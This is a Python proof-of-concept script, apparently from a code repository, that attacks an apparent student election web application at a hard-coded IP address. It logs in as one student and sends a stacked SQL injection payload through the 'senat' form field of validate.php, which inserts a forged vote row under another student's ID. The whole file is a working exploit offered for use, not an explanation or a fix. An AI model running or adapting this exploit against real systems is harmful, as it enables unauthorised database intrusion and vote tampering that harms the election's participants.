PoC for Pemira Development Application SQLi Vulnerability
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 

44 lines
1.1 KiB

#!/usr/bin/python2
import requests
from PemiraHelper import login, PemiraParser, ID_BALMA, ID_SEMA
HOST = "103.200.7.4"
PAYLOAD_SQLI = "INSERT INTO tb_pemilu(id_calon, nim_mhs, ip) VALUES('%s', %d, '%s')" % (
ID_BALMA[0], 180010001, '127.0.0.1')
def generate_sqli_payload():
return "'; %s;/*-*/ SELECT * FROM tb_mhs WHERE nim='" % PAYLOAD_SQLI
def pemira_atk_sqli():
with requests.Session() as conn:
parser = PemiraParser()
login_page = login(conn, HOST, "180010002")
# print(login_page.text)
parser.feed(login_page.text)
# voting_page = conn.post("http://103.200.7.4/validate.php", data={
# "token_":TOKEN,
# "senat":"JLamqe5q-KTU3vVnd",
# "balma":"BVmJxh6E-S9af54pY",
# "formSubmit":"Submit"
# })
voting_page = conn.post("http://%s/validate.php" % HOST, data={
"token_": parser.TOKEN,
"senat": generate_sqli_payload(),
"balma": "BVmJxh6E-S9af54pY",
"formSubmit": "Submit"
})
print(voting_page.text)
def main():
pemira_atk_sqli()
if __name__ == '__main__':
main()